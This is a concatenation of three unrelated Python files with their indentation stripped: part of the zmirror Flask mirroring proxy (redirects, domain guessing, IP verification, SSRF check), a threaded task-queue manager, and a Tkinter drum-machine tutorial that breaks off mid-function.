if parse.url_no_scheme not in url_to_use_cdn:
# 计算远程响应的长度
if "Content-Length" in parse.remote_response.headers:
# 如果服务器在响应头中指定了长度, 那么就直接读取
length = parse.remote_response.headers.get("Content-Length")
elif parse.streamed_our_response:
# 在流式传输下, 我们无法立即读取响应内容, 所以如果服务器没有提供响应, 我们无法知道到底有多长
# 响应的实际长度会在实际读取响应时被计算出来, 但是可能会不准确
length = -1
else:
# 在非流式传输的情况下, requests会立即取回整个响应体, 所以可以直接测量它的长度
length = len(parse.remote_response.content)
# 记录本URL的信息
url_to_use_cdn[parse.url_no_scheme] = [False, parse.mime, length]
if is_content_type_using_cdn(parse.mime):
# mark it to use cdn, and record it's url without scheme.
# eg: If SERVER's request url is http://example.com/2333?a=x, we record example.com/2333?a=x
# because the same url for http and https SHOULD be the same, drop the scheme would increase performance
url_to_use_cdn[parse.url_no_scheme][0] = True # 标记为使用CDN
dbgprint('CDN enabled for:', parse.url_no_scheme)
else:
dbgprint('CDN disabled for:', parse.url_no_scheme)
def guess_correct_domain(depth=7):
"""
猜测url所对应的正确域名
当响应码为 404 或 500 时, 很有可能是把请求发送到了错误的域名
而应该被发送到的正确域名, 很有可能在最近几次请求的域名中
本函数会尝试最近使用的域名, 如果其中有出现响应码为 200 的, 那么就认为这条url对应这个域名
相当于发生了一次隐式url重写
* 本函数很可能会改写 parse 与 request
:rtype: Union[Tuple[Response, float], None]
"""
current_domain = parse.remote_domain
sp = list(urlsplit(parse.remote_url))
redirected = None
for i, domain in enumerate(recent_domains.keys()[:depth]):
if domain == current_domain:
continue
sp[1] = domain # 设置域名
try:
# 尝试发送请求, 允许请求失败
resp = send_request(
urlunsplit(sp),
method=request.method,
headers=parse.client_header,
data=parse.request_data_encoded,
)
except: # coverage: exclude
continue
if 400 <= resp.status_code <= 599: # 40x or 50x, eg:404 503 500
# 失败
dbgprint("Domain guess failed:", domain, v=4)
if i != depth - 1 or redirected is None:
continue
else:
# 在所有结果都尝试失败时, 如果之前有请求到重定向的域名, 则取出
resp, domain = redirected
elif 300 <= resp.status_code <= 399:
if i != depth - 1:
# 对于重定向结果, 暂时进行缓存, 仅当所有尝试都失败时, 才取出它们
if redirected is None:
# 当之前已经出现过一次重定向的结果, 则丢弃迟出现的
# 因为越靠前的域名, 越有可能是真正的域名
redirected = (resp, domain)
continue
elif redirected is not None: # 最后一轮执行
# 当之前已经出现过一次重定向的结果, 则丢弃迟出现的
resp, domain = redirected
else:
continue
# 成功找到
dbgprint("domain guess successful, from", current_domain, "to", domain)
parse.set_extra_resp_header("X-Domain-Guess", domain)
# 隐式重写域名
rewrited_url = encode_mirror_url( # 重写后的url
parse.remote_path_query,
remote_domain=domain,
is_scheme=True,
)
dbgprint("Shadow rewriting, from", request.url, "to", rewrited_url)
request.url = rewrited_url
# 写入缓存
domain_guess_cache[(current_domain, request.path)] = domain
# 写log
try:
with open(zmirror_root("domain_guess.log"), "a", encoding="utf-8") as fw:
fw.write("{}\t{}\t{}\t-->\t{}\n".format(datetime.now(), current_domain, request.path, domain))
except: # coverage: exclude
pass
request.path = urlsplit(rewrited_url).path
# 重新生成 parse 变量
assemble_parse()
return resp
else: # 全部尝试失败 # coverage: exclude
return None
def request_remote_site():
"""
请求远程服务器(high-level), 并在返回404/500时进行 domain_guess 尝试
"""
# 请求被镜像的网站
# 注意: 在zmirror内部不会处理重定向, 重定向响应会原样返回给浏览器
parse.remote_response = send_request(
parse.remote_url,
method=request.method,
headers=parse.client_header,
data=parse.request_data_encoded,
)
if parse.remote_response.url != parse.remote_url:
warnprint("requests's remote url", parse.remote_response.url,
'does no equals our rewrited url', parse.remote_url)
if 400 <= parse.remote_response.status_code <= 599:
# 猜测url所对应的正确域名
dbgprint("Domain guessing for", request.url)
result = guess_correct_domain()
if result is not None:
parse.remote_response = result
def filter_client_request():
"""过滤用户请求, 视情况拒绝用户的访问
:rtype: Union[Response, None]
"""
dbgprint('Client Request Url: ', request.url)
# crossdomain.xml
if os.path.basename(request.path) == 'crossdomain.xml':
dbgprint('crossdomain.xml hit from', request.url)
return crossdomain_xml()
# Global whitelist ua
if check_global_ua_pass(str(request.user_agent)):
return None
if is_deny_spiders_by_403 and is_denied_because_of_spider(str(request.user_agent)):
return generate_simple_resp_page(b'Spiders Are Not Allowed To This Site', 403)
if human_ip_verification_enabled and (
((human_ip_verification_whitelist_from_cookies or enable_custom_access_cookie_generate_and_verify)
and must_verify_cookies)
or is_ip_not_in_allow_range(request.remote_addr)
):
dbgprint('ip', request.remote_addr, 'is verifying cookies')
if 'zmirror_verify' in request.cookies and \
((human_ip_verification_whitelist_from_cookies and verify_ip_hash_cookie(request.cookies.get('zmirror_verify')))
or (enable_custom_access_cookie_generate_and_verify and custom_verify_access_cookie(
request.cookies.get('zmirror_verify'), request))):
ip_whitelist_add(request.remote_addr, info_record_dict=request.cookies.get('zmirror_verify'))
dbgprint('add to ip_whitelist because cookies:', request.remote_addr)
else:
return redirect(
"/ip_ban_verify_page?origin=" + base64.urlsafe_b64encode(str(request.url).encode(encoding='utf-8')).decode(
encoding='utf-8'),
code=302)
return None
def prior_request_redirect():
"""对用户的请求进行按需重定向处理
与 rewrite_client_request() 不同, 使用301/307等进行外部重定向, 不改变服务器内部数据
遇到任意一个需要重定向的, 就跳出本函数
这是第一阶段重定向
第一阶段重定向, 是在 rewrite_client_request() 内部隐式重写 *之前* 的重定向
第二阶段重定向, 是在 rewrite_client_request() 内部隐式重写 *之后* 的重定向
如果 `custom_prior_request_redirect_enable` 启用, 则会调用 custom_func.custom_prior_redirect_func() 进行自定义重定向
:return: 如果不需要重定向, 则返回None, 否则返回重定向的 Response
:rtype: Union[Response, None]
"""
# 非外部域名被错误地当成了外部域名, 则需要重定向修正
if not parse.is_external_domain and '/extdomains/' == request.path[:12]:
dbgprint('Requesting main domain in extdomains, redirect back.')
return redirect(parse.remote_path_query, code=307)
# 镜像隔离机制, 根据 referer 判断当前所处的镜像, 在子镜像中, 若请求不包含 /extdomains/ 的url, 将会被重定向修正
if enable_individual_sites_isolation and '/extdomains/' != request.path[:12] and request.headers.get('referer'):
reference_domain = decode_mirror_url(request.headers.get('referer'))['domain']
if reference_domain in isolated_domains:
return redirect(encode_mirror_url(parse.remote_path_query, reference_domain), code=307)
if url_custom_redirect_enable:
# 简单的自定义重定向, 详见 config: url_custom_redirect_list
if request.path in url_custom_redirect_list:
redirect_to = request.url.replace(request.path, url_custom_redirect_list[request.path], 1)
dbgprint('Redirect from', request.url, 'to', redirect_to)
return redirect(redirect_to, code=307)
# 基于正则的自定义重定向, 详见 config: url_custom_redirect_regex
for regex_match, regex_replace in url_custom_redirect_regex:
if re.match(regex_match, parse.remote_path_query, flags=re.IGNORECASE) is not None:
redirect_to = re.sub(regex_match, regex_replace, parse.remote_path_query, flags=re.IGNORECASE)
dbgprint('Redirect from', request.url, 'to', redirect_to)
return redirect(redirect_to, code=307)
if custom_prior_request_redirect_enable:
# 自定义重定向
redirection = custom_prior_redirect_func(request, parse) # type: Union[Response, None]
if redirection is not None:
return redirection
def posterior_request_redirect():
"""
这是第二阶段重定向, 内部隐式重写 *之后* 的重定向
第一阶段重定向, 是在 rewrite_client_request() 内部隐式重写 *之前* 的重定向
第二阶段重定向, 是在 rewrite_client_request() 内部隐式重写 *之后* 的重定向
遇到任意一个需要重定向的, 就跳出本函数
:return: 如果不需要重定向, 则返回None, 否则返回重定向的 Response
:rtype: Union[Response, None]
"""
# CDN软重定向
# 具体请看 config 中 cdn_redirect_code_if_cannot_hard_rewrite 选项的说明
if enable_static_resource_CDN: # CDN总开关
if (cdn_redirect_code_if_cannot_hard_rewrite # CDN软(301/307)重定向开关
# 该URL所对应的资源已知, 即之前已经被成功请求过
and parse.url_no_scheme in url_to_use_cdn
# 并且该资源已经被判断为可以应用CDN
and url_to_use_cdn[parse.url_no_scheme][0]
# 只缓存 GET 方法的资源
and parse.method == 'GET'
# 只有超过大小下限才会重定向
and int(url_to_use_cdn[parse.url_no_scheme][2]) > cdn_soft_redirect_minimum_size
# 请求者的UA符合CDN提供商的爬虫, 则返回实际的资源
and not is_ua_in_whitelist(str(request.user_agent))
):
# 下面这个urljoin, 是把形如 https://foo.com/a.png?q=233 的url转化为对应的CDN URL https://cdn.com/a.png?q=233
redirect_to_url = urljoin(
my_host_scheme
# 根据url的crc32取余来选取一个CDN域名
# 使用crc32, 而不是随机数, 是为了确保相同的URL每次都能应用相同的CDN域名
# 以增加CDN和缓存命中率
+ CDN_domains[zlib.adler32(parse.url_no_scheme.encode()) % cdn_domains_number],
extract_url_path_and_query() # 得到目标url的 /a.png?q=233 这么个部分
)
if cdn_redirect_encode_query_str_into_url:
# 将 ?q=233 这种查询字串编码进path, 详情看config里的说明
redirect_to_url = embed_real_url_to_embedded_url(
redirect_to_url, url_mime=url_to_use_cdn[parse.url_no_scheme][1])
return redirect(redirect_to_url, code=cdn_redirect_code_if_cannot_hard_rewrite)
# 本地缓存若命中则直接返回
if local_cache_enable:
resp = try_get_cached_response(parse.remote_url, parse.client_header)
if resp is not None:
dbgprint('CacheHit,Return')
if parse.time.get("start_time") is not None:
parse.set_extra_resp_header('X-Compute-Time', "%.4f" % (process_time() - parse.time["start_time"]))
return resp
# 基于 domain_guess 的重定向
if (parse.remote_domain, request.path) in domain_guess_cache:
domain = domain_guess_cache[(parse.remote_domain, request.path)]
rewrited_url = encode_mirror_url( # 重写后的url
parse.remote_path_query,
remote_domain=domain,
is_scheme=True,
)
dbgprint("Redirect via domain_guess_cache, from", request.url, "to", rewrited_url)
return redirect(rewrited_url, code=307)
def assemble_parse():
"""将用户请求的URL解析为对应的目标服务器URL"""
_temp = decode_mirror_url()
parse.remote_domain = _temp['domain'] # type: str
parse.is_https = _temp['is_https'] # type: bool
parse.remote_path = _temp['path'] # type: str
parse.remote_path_query = _temp['path_query'] # type: str
parse.is_external_domain = is_external_domain(parse.remote_domain)
parse.remote_url = assemble_remote_url() # type: str
parse.url_no_scheme = parse.remote_url[parse.remote_url.find('//') + 2:] # type: str
recent_domains[parse.remote_domain] = True # 写入最近使用的域名
dbgprint('after assemble_parse, url:', parse.remote_url, ' path_query:', parse.remote_path_query)
def rewrite_client_request():
"""
在这里的所有重写都只作用程序内部, 对请求者不可见
与 prior_request_redirect() 的外部301/307重定向不同,
本函数通过改变程序内部变量来起到重定向作用
返回True表示进行了重定向, 需要重载某些设置, 返回False表示未重定向
遇到重写后, 不会跳出本函数, 而是会继续下一项. 所以重写顺序很重要
"""
has_been_rewrited = False
# ------------- 请求重写代码开始 ----------------
if cdn_redirect_encode_query_str_into_url:
real_url = extract_real_url_from_embedded_url(request.url)
if real_url is not None:
dbgprint("BeforeEmbeddedExtract:", request.url, " After:", real_url)
request.url = real_url
request.path = urlsplit(real_url).path
has_been_rewrited = True
if url_custom_redirect_enable and shadow_url_redirect_regex:
_path_query = extract_url_path_and_query()
_path_query_raw = _path_query
for before, after in shadow_url_redirect_regex:
_path_query = re.sub(before, after, _path_query)
if _path_query != _path_query_raw:
dbgprint('ShadowUrlRedirect:', _path_query_raw, 'to', _path_query)
request.url = myurl_prefix + _path_query
request.path = urlsplit(_path_query).path
has_been_rewrited = True
break
# ------------- 请求重写代码结束 ----------------
# 如果进行了重写, 那么 has_been_rewrited 为 True
# 在 rewrite_client_request() 函数内部会更改 request.url
# 所以此时需要重新解析一遍
if has_been_rewrited:
assemble_parse()
return has_been_rewrited
# ################# End Middle Functions #################
# ################# Begin Flask After Request ################
@app.after_request
def zmirror_after_request(response):
# 移除 connection_pool 中的锁
if enable_connection_keep_alive:
connection_pool.release_lock()
return response
# ################# End Flask After Request ################
# ################# Begin Flask #################
@app.route('/zmirror_stat')
def zmirror_status():
"""返回服务器的一些状态信息"""
if request.remote_addr and request.remote_addr != '127.0.0.1':
return generate_simple_resp_page(b'Only 127.0.0.1 are allowed', 403)
output = ""
output += strx('extract_real_url_from_embedded_url', extract_real_url_from_embedded_url.cache_info())
output += strx('\nis_content_type_streamed', is_mime_streamed.cache_info())
output += strx('\nembed_real_url_to_embedded_url', embed_real_url_to_embedded_url.cache_info())
output += strx('\ncheck_global_ua_pass', check_global_ua_pass.cache_info())
output += strx('\nextract_mime_from_content_type', extract_mime_from_content_type.cache_info())
output += strx('\nis_content_type_using_cdn', is_content_type_using_cdn.cache_info())
output += strx('\nis_ua_in_whitelist', is_content_type_using_cdn.cache_info())
output += strx('\nis_mime_represents_text', is_mime_represents_text.cache_info())
output += strx('\nis_domain_match_glob_whitelist', is_domain_match_glob_whitelist.cache_info())
output += strx('\nverify_ip_hash_cookie', verify_ip_hash_cookie.cache_info())
output += strx('\nis_denied_because_of_spider', is_denied_because_of_spider.cache_info())
output += strx('\nis_ip_not_in_allow_range', is_ip_not_in_allow_range.cache_info())
output += strx('\n\ncurrent_threads_number', threading.active_count())
# output += strx('\nclient_requests_text_rewrite', client_requests_text_rewrite.cache_info())
# output += strx('\nextract_url_path_and_query', extract_url_path_and_query.cache_info())
output += strx('\n----------------\n')
output += strx('\ndomain_alias_to_target_set', domain_alias_to_target_set)
return "<pre>" + output + "</pre>\n"
@app.route('/ip_ban_verify_page', methods=['GET', 'POST'])
def ip_ban_verify_page():
"""生成一个身份验证页面"""
if request.method == 'GET':
dbgprint('Verifying IP:', request.remote_addr)
form_body = ''
for q_id, _question in enumerate(human_ip_verification_questions):
form_body += r"""%s <input type="text" name="%d" placeholder="%s" style="width: 190px;" /><br/>""" \
% (_question[0], q_id, (html_escape(_question[2]) if len(_question) >= 3 else ""))
for rec_explain_string, rec_name, input_type in human_ip_verification_identity_record:
form_body += r"""%s %s<input type="%s" name="%s" /><br/>""" % (
rec_explain_string,
('<span style="color: red;">(必填)<span> ' if human_ip_verification_answer_any_one_questions_is_ok else ""),
html_escape(input_type), html_escape(rec_name))
if 'origin' in request.args:
form_body += r"""<input type="hidden" name="origin" value="%s" style="width: 190px;" />""" % html_escape(
request.args.get('origin'))
return r"""<!doctype html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<title>%s</title>
</head>
<body>
<h1>%s</h1>
<p>这样的验证只会出现一次,通过后您会被加入白名单,之后相同IP的访问不会再需要验证。<br/>
提示: 由于手机和宽带IP经常会发生改变,您可能会多次看到这一页面。</p>
%s <br>
<pre style="border: 1px dashed;">%s</pre>
<form method='post'>%s<button type='submit'>递交</button>
</form>
</body>
</html>""" % (
html_escape(human_ip_verification_title), html_escape(human_ip_verification_title),
("只需要回答出以下<b>任意一个</b>问题即可" if human_ip_verification_answer_any_one_questions_is_ok
else "你需要回答出以下<b>所有问题</b>"),
human_ip_verification_description, form_body)
elif request.method == 'POST':
dbgprint('Verifying Request Form', request.form)
# 遍历所有问题, 看有没有正确回答上来
for q_id, _question in enumerate(human_ip_verification_questions):
submitted_answer = request.form.get(str(q_id), '')
if submitted_answer == '': # 没有回答这个问题
if human_ip_verification_answer_any_one_questions_is_ok: # 如果只需要回答一个, 那么就跳过
continue
else: # 如果全部都需要回答, 那么报错
return generate_simple_resp_page(b'Please answer question: ' + _question[0].encode(), 200)
if submitted_answer != _question[1]: # 如果回答了, 但是答案错误
return generate_simple_resp_page(b'Wrong answer in: ' + _question[0].encode(), 200)
elif human_ip_verification_answer_any_one_questions_is_ok:
break # 只需要正确回答出一个, 就通过
else: # 如果在for中是break跳出的, 就不会执行else, 只有正常执行完for才会进入else
if human_ip_verification_answer_any_one_questions_is_ok: # 如果只需要回答一个, 进入else表示一个问题都没回答
return generate_simple_resp_page(b'Please answer at least ONE question', 200)
record_dict = {}
for rec_explain_string, rec_name, form_type in human_ip_verification_identity_record:
if rec_name not in request.form or not request.form[rec_name]:
return generate_simple_resp_page(b'Param Missing or Blank: ' + rec_explain_string.encode(), 200)
else:
record_dict[rec_name] = request.form[rec_name]
origin = '/'
if 'origin' in request.form:
try:
origin = base64.urlsafe_b64decode(request.form.get('origin')).decode(encoding='utf-8')
except: # coverage: exclude
return generate_error_page(
"Unable to decode origin from value:" + html_escape(request.form.get('origin')), is_traceback=True)
else:
netloc = urlsplit(origin).netloc
if netloc and netloc != my_host_name:
origin = '/'
if identity_verify_required:
if not custom_identity_verify(record_dict):
return generate_simple_resp_page(b'Verification Failed, please check', 200)
resp = generate_html_redirect_page(origin, msg=human_ip_verification_success_msg)
if human_ip_verification_whitelist_from_cookies:
_hash = generate_ip_verify_hash(record_dict)
resp.set_cookie(
'zmirror_verify',
_hash,
expires=datetime.now() + timedelta(days=human_ip_verification_whitelist_cookies_expires_days),
max_age=human_ip_verification_whitelist_cookies_expires_days * 24 * 3600
# httponly=True,
# domain=my_host_name
)
record_dict['__zmirror_verify'] = _hash
elif enable_custom_access_cookie_generate_and_verify:
_hash = custom_generate_access_cookie(record_dict, request)
dbgprint('SelfGeneratedCookie:', _hash)
if _hash is None:
return generate_simple_resp_page(b'Verification Failed, please check', 200)
resp.set_cookie(
'zmirror_verify',
_hash,
expires=datetime.now() + timedelta(days=human_ip_verification_whitelist_cookies_expires_days),
max_age=human_ip_verification_whitelist_cookies_expires_days * 24 * 3600
# httponly=True,
# domain=my_host_name
)
record_dict['__zmirror_verify'] = _hash
ip_whitelist_add(request.remote_addr, info_record_dict=record_dict)
return resp
@app.route('/', methods=['GET', 'POST', 'OPTIONS', 'PUT', 'DELETE', 'HEAD', 'PATCH'])
@app.route('/<path:input_path>', methods=['GET', 'POST', 'OPTIONS', 'PUT', 'DELETE', 'HEAD', 'PATCH'])
def zmirror_enter(input_path='/'):
"""入口函数的壳, 只是包了一层异常处理, 实际是 main_function() """
try:
resp = main_function(input_path=input_path)
# 加入额外的响应头
for name, value in parse.extra_resp_headers.items():
resp.headers.set(name, value)
# 加入额外的cookies
for name, cookie_string in parse.extra_cookies.items():
resp.headers.add("Set-Cookie", cookie_string)
except: # coverage: exclude
return generate_error_page(is_traceback=True)
else:
return resp
# noinspection PyUnusedLocal
def main_function(input_path='/'):
"""本程序的实际入口函数
:rtype: Response
"""
dbgprint('-----BeginRequest-----')
# parse 类似于 flask 的 request, 是 zmirror 特有的一个 thread-local 变量
# 这个变量的重要性不亚于 request, 在 zmirror 各个部分都会用到
# 其各个变量的含义请看 zmirror.threadlocal.ZmirrorThreadLocal 中的说明
parse.init()
parse.method = request.method
parse.time["start_time"] = process_time() # to display compute time
# 将用户请求的URL解析为对应的目标服务器URL
assemble_parse()
# 对用户请求进行检查和过滤
# 不符合条件的请求(比如爬虫)将终止执行
# 函数不会修改 parse
r = filter_client_request()
if r is not None: # 如果函数返回值不是None, 则表示需要响应给用户
dbgprint('-----EndRequest(filtered out)-----')
return r
# 对用户请求进行第一级重定向(隐式重写前的重定向)
# 函数不会修改 parse
# 此重定向对用户可见, 是301/302/307重定向
r = prior_request_redirect()
if r is not None:
# 如果返回的是None, 则表示未发生重定向, 照常继续
# 如果返回的是一个flask Response 对象, 则表示需要进行重定向, 原样返回此对象即可
# 下同
return r
# 进行请求的隐式重写/重定向
# 隐式重写只对 zmirror 内部生效, 对浏览器透明
# 重写可能会修改 flask 的内置 request 变量
# 可能会修改 parse
has_been_rewrited = rewrite_client_request()
# 第一层SSRF检查, 防止请求不允许的网站
if ssrf_check_layer_1():
return generate_simple_resp_page(b'SSRF Prevention! Your domain is NOT ALLOWED.', 403)
# 提取出经过必要重写后的浏览器请求头
parse.client_header = extract_client_header() # type: dict
# 对用户请求进行第二级重定向(隐式重写后的重定向)
# 与一级重定向一样, 是301/302/307重定向
r = posterior_request_redirect()
if r is not None:
return r
# 解析并重写浏览器请求的data内容
parse.request_data, parse.request_data_encoding = prepare_client_request_data()
# 请求真正的远程服务器
# 并在返回404/500时进行 domain_guess 尝试
# domain_guess的解释请看函数 guess_correct_domain() 中的注释
request_remote_site()
# 解析远程服务器的响应
parse_remote_response()
# 生成我们的响应
resp = generate_our_response()
# storge entire our server's response (headers included)
if local_cache_enable and parse.cacheable:
put_response_to_local_cache(parse.remote_url, resp, without_content=parse.streamed_our_response)
dbgprint('-----EndRequest-----')
return resp
@app.route('/crossdomain.xml')
def crossdomain_xml():
return Response("""<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*" secure="false"/>
</cross-domain-policy>""", content_type='text/x-cross-domain-policy')
@app.route('/about_zmirror')
def about_zmirror():
return Response("""zmirror
version: {version}
Author: {author}
Github: {github_url}
Note: Love Luciaz Forever!
Mirroring: {source_site}
This site: {my_domain}
""".format(version=CONSTS.__VERSION__, author=CONSTS.__AUTHOR__,
github_url=CONSTS.__GITHUB_URL__, source_site=target_domain,
my_domain=my_host_name),
content_type='text/plain')
# ################# End Flask #################
# ################# Begin Post (auto)Exec Section #################
# ########### domain replacer prefix string buff ###############
prefix_buff = {}
for _domain in allowed_domains_set:
prefix_buff[_domain] = calc_domain_replace_prefix(_domain)
if human_ip_verification_enabled:
single_ip_allowed_set = load_ip_whitelist_file()
else:
single_ip_allowed_set = set()
try:
if unittest_mode:
import importlib
# 在 unittest 中, 由于 custom_func 也会引用 zmirror
# 带来一个额外的引用计数
# 所以在 unittest 中, 每次重载 zmirror 的时候, 都需要重载一次 custom_func
importlib.reload(importlib.import_module("custom_func"))
from custom_func import *
except: # coverage: exclude
pass
if custom_text_rewriter_enable:
try:
from custom_func import custom_response_text_rewriter
except: # coverage: exclude
warnprint('Cannot import custom_response_text_rewriter custom_func.py,'
' `custom_text_rewriter` is now disabled(if it was enabled)')
raise
if identity_verify_required:
try:
from custom_func import custom_identity_verify
except: # coverage: exclude
identity_verify_required = False
warnprint('Cannot import custom_identity_verify from custom_func.py,'
' `identity_verify` is now disabled (if it was enabled)')
raise
if enable_custom_access_cookie_generate_and_verify:
try:
from custom_func import custom_generate_access_cookie, custom_verify_access_cookie
except: # coverage: exclude
enable_custom_access_cookie_generate_and_verify = False
errprint('Cannot import custom_generate_access_cookie and custom_generate_access_cookie from custom_func.py,'
' `enable_custom_access_cookie_generate_and_verify` is now disabled (if it was enabled)')
raise
if enable_cron_tasks:
for _task_dict in cron_tasks_list:
try:
_task_dict['target'] = globals()[_task_dict['target']]
cron_task_container(_task_dict, add_task_only=True)
except Exception as e:
errprint('UnableToInitCronTask', e)
raise
th = threading.Thread(target=cron_task_host, daemon=True)
th.start()
# ################# End Post (auto)Exec Section #################
if __name__ == '__main__':
errprint('Please use `python3 wsgi.py` to run')
exit()
|
async_task_manager.py
|
import queue
from threading import Thread
from typing import Any, Callable, ContextManager, Iterable, Mapping, Optional
from ..utils import get_logger
log = get_logger(__name__)
STOP = -1
STOP_TASK = (
STOP,
STOP,
STOP,
)
class Queue(queue.Queue):
def clear(self):
with self.mutex:
unfinished_tasks = self.unfinished_tasks - len(self.queue)
if unfinished_tasks <= 0:
if unfinished_tasks < 0:
raise ValueError("task_done() called too many times")
self.all_tasks_done.notify_all()
self.unfinished_tasks = unfinished_tasks
self.queue.clear()
self.not_full.notify_all()
class AsyncTaskManager(ContextManager):
"""
Multithreaded task manager.
Not that the manager itself is not thread safe - meaning it can be used only in a single thread.
"""
def __init__(self, workers_amount: int = 5, iter_timeout: Optional[float] = None):
super().__init__()
self.iter_timeout = iter_timeout
self._task_queue: Queue = Queue()
self._result_queue: Queue = Queue()
self._total_task_count = 0
self._workers_count = 0
self.start_workers(workers_amount)
def __iter__(self):
return self
def __next__(self):
if self.is_work_done and self.is_empty:
raise StopIteration()
return self.get_result(timeout=self.iter_timeout)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.__del__()
def __del__(self):
self.kill()
@property
def is_work_done(self) -> bool:
"""
:return: True iff all tasks processing is done.
"""
return self._task_queue.unfinished_tasks == 0
@property
def is_empty(self) -> bool:
"""
:return: True iff all results fetching is done.
"""
return self._result_queue.unfinished_tasks == 0
@property
def is_closed(self) -> bool:
"""
:return: True iff all worker threads are closed.
"""
return self._workers_count == 0
@property
def total_task_count(self) -> int:
return self._total_task_count
def start_workers(self, workers_amount: int):
log.debug(f"Starting {workers_amount} workers.")
for i in range(workers_amount):
thread = Thread(target=self._work, daemon=True)
thread.start()
self._workers_count += 1
def add_task(self, func: Callable, args: Iterable = None, kwargs: Mapping = None):
if self.is_closed:
return
args = tuple(args) if args else ()
kwargs = kwargs or {}
self._total_task_count += 1
self._task_queue.put((func, args, kwargs))
def _work(self):
log.debug("Worker starting.")
while True:
func, args, kwargs = self._task_queue.get()
if func == STOP:
self._task_queue.task_done()
break
result = func(*args, **kwargs)
self._result_queue.put(result)
self._task_queue.task_done()
log.debug("Worker done.")
def get_result(self, timeout: Optional[float] = 3) -> Any:
result = self._result_queue.get(block=True, timeout=timeout)
self._result_queue.task_done()
return result
def stop_workers(self, amount: int = None):
if amount is None:
amount = self._workers_count
log.debug(f"Stopping {amount} workers.")
for i in range(amount):
self._task_queue.put(STOP_TASK)
self._workers_count -= 1
def kill(self):
log.debug(f"Removing all items from task queue (current size is {self._task_queue.qsize()})...")
self._task_queue.clear()
self.join()
def join(self):
log.debug("Joining all workers...")
self._task_queue.join() # Wait until all work is done
self.stop_workers()
self._task_queue.join() # Wait until all workers are dead
|
3.07.py
|
"""
Code illustration: 3.07
Tkinter and Threading
**********************
New modules imported here:
- threading
New methods defined here:
- play_in_thread()
- toggle_play_button_state()
Method modified here:
- start_play()
- __init__ method - to override the close button
- on_play_button_clicked()
- on_stop_button_clicked()
- on_loop_button_toggled()
- play_pattern() - added a call to toggle_play_button_state()
Chapter 3 : Programmable Drum Machine
Tkinter GUI Application Development Blueprints
"""
import os
import time
import threading
from tkinter import Tk, Entry, W, E, N, S, PhotoImage, Checkbutton, Button, \
Menu, Frame, Label, Spinbox, END, BooleanVar
from tkinter import filedialog
import pygame
PROGRAM_NAME = ' Explosion Drum Machine '
MAX_NUMBER_OF_PATTERNS = 10
MAX_NUMBER_OF_DRUM_SAMPLES = 5
MAX_NUMBER_OF_UNITS = 5
MAX_BPU = 5
INITIAL_NUMBER_OF_UNITS = 4
INITIAL_BPU = 4
INITIAL_BEATS_PER_MINUTE = 240
MIN_BEATS_PER_MINUTE = 80
MAX_BEATS_PER_MINUTE = 360
COLOR_1 = 'grey55'
COLOR_2 = 'khaki'
BUTTON_CLICKED_COLOR = 'green'
class DrumMachine:
def __init__(self, root):
self.root = root
self.root.title(PROGRAM_NAME)
self.all_patterns = [None] * MAX_NUMBER_OF_PATTERNS
self.beats_per_minute = INITIAL_BEATS_PER_MINUTE
self.current_pattern_index = 0
self.loop = True
self.now_playing = False
self.drum_load_entry_widget = [None] * MAX_NUMBER_OF_DRUM_SAMPLES
self.init_all_patterns()
self.init_gui()
def on_open_file_button_clicked(self, drum_index):
def event_handler():
file_path = filedialog.askopenfilename(defaultextension=".wav",
filetypes=[("Wave Files", "*.wav"), ("OGG Files", "*.ogg")])
if not file_path:
return
self.set_drum_file_path(drum_index, file_path)
self.display_all_drum_file_names()
return event_handler
def display_all_drum_file_names(self):
for i, drum_name in enumerate(self.get_list_of_drum_files()):
self.display_drum_name(i, drum_name)
def display_drum_name(self, text_widget_num, file_path):
if file_path is None:
return
drum_name = os.path.basename(file_path)
self.drum_load_entry_widget[text_widget_num].delete(0, END)
self.drum_load_entry_widget[text_widget_num].insert(0, drum_name)
#
# getters and setters begins
#
def get_current_pattern_dict(self):
return self.all_patterns[self.current_pattern_index]
def get_bpu(self):
return self.get_current_pattern_dict()['bpu']
def set_bpu(self):
self.get_current_pattern_dict()['bpu'] = int(self.bpu_widget.get())
def get_number_of_units(self):
return self.get_current_pattern_dict()['number_of_units']
def set_number_of_units(self):
self.get_current_pattern_dict(
)['number_of_units'] = int(self.number_of_units_widget.get())
def get_list_of_drum_files(self):
return self.get_current_pattern_dict()['list_of_drum_files']
def get_drum_file_path(self, drum_index):
return self.get_list_of_drum_files()[drum_index]
def set_drum_file_path(self, drum_index, file_path):
self.get_list_of_drum_files()[drum_index] = file_path
def get_is_button_clicked_list(self):
return self.get_current_pattern_dict()['is_button_clicked_list']
def set_is_button_clicked_list(self, num_of_rows, num_of_columns):
self.get_current_pattern_dict()['is_button_clicked_list'] = [
[False] * num_of_columns for x in range(num_of_rows)]
def init_all_patterns(self):
self.all_patterns = [
{
'list_of_drum_files': [None] * MAX_NUMBER_OF_DRUM_SAMPLES,
'number_of_units': INITIAL_NUMBER_OF_UNITS,
'bpu': INITIAL_BPU,
'is_button_clicked_list':
self.init_is_button_clicked_list(
MAX_NUMBER_OF_DRUM_SAMPLES,
INITIAL_NUMBER_OF_UNITS * INITIAL_BPU
)
}
for k in range(MAX_NUMBER_OF_PATTERNS)]
def on_pattern_changed(self):
pass
def on_number_of_units_changed(self):
self.set_number_of_units()
self.set_is_button_clicked_list(MAX_NUMBER_OF_DRUM_SAMPLES,
self.find_number_of_columns())
self.create_right_button_matrix()
def on_bpu_changed(self):
self.set_bpu()
self.set_is_button_clicked_list(MAX_NUMBER_OF_DRUM_SAMPLES,
self.find_number_of_columns())
self.create_right_button_matrix()
def play_in_thread(self):
self.thread = threading.Thread(target = self.play_pattern)
self.thread.start()
def on_play_button_clicked(self):
self.start_play()
self.toggle_play_button_state()
def start_play(self):
self.init_pygame()
self.play_in_thread()
def on_stop_button_clicked(self):
self.stop_play()
self.toggle_play_button_state()
def toggle_play_button_state(self):
if self.now_playing:
self.play_button.config(state="disabled")
else:
self.play_button.config(state="normal")
def exit_app(self):
self.now_playing = False
if messagebox.askokcancel("Quit", "Really quit?"):
self.root.destroy()
def stop_play(self):
self.now_playing = False
def init_pygame(self):
pygame.mixer.pre_init(44100, -16, 1, 512)
pygame.init()
def play_sound(self, sound_filename):
if sound_filename is not None:
